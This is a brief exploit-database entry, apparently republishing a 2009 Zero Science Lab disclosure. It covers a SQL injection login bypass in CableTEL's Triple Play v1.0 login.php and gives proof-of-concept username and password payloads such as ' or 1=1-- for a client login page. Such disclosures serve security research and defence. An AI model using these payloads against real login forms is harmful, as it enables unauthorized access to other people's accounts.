CableTEL's Triple Play version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
66a0568bac2f590dd4f8c25a6f63c8c5
##############################################################################
CableTEL's Triple Play v1.0 (login.php) Remote Login Bypass SQL Injection Exploit
21.12.2009
by Gjoko 'LiquidWorm' Krstic
Zero Science Lab
http://www.zeroscience.mk
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4925.php
##############################################################################
PoC:
https://clients.[site]/clients/index.php
user and pass:
'+ '+
[space] [space]
' or 1=1-- ' or 1=1--
Comments
No comments yet, be the first!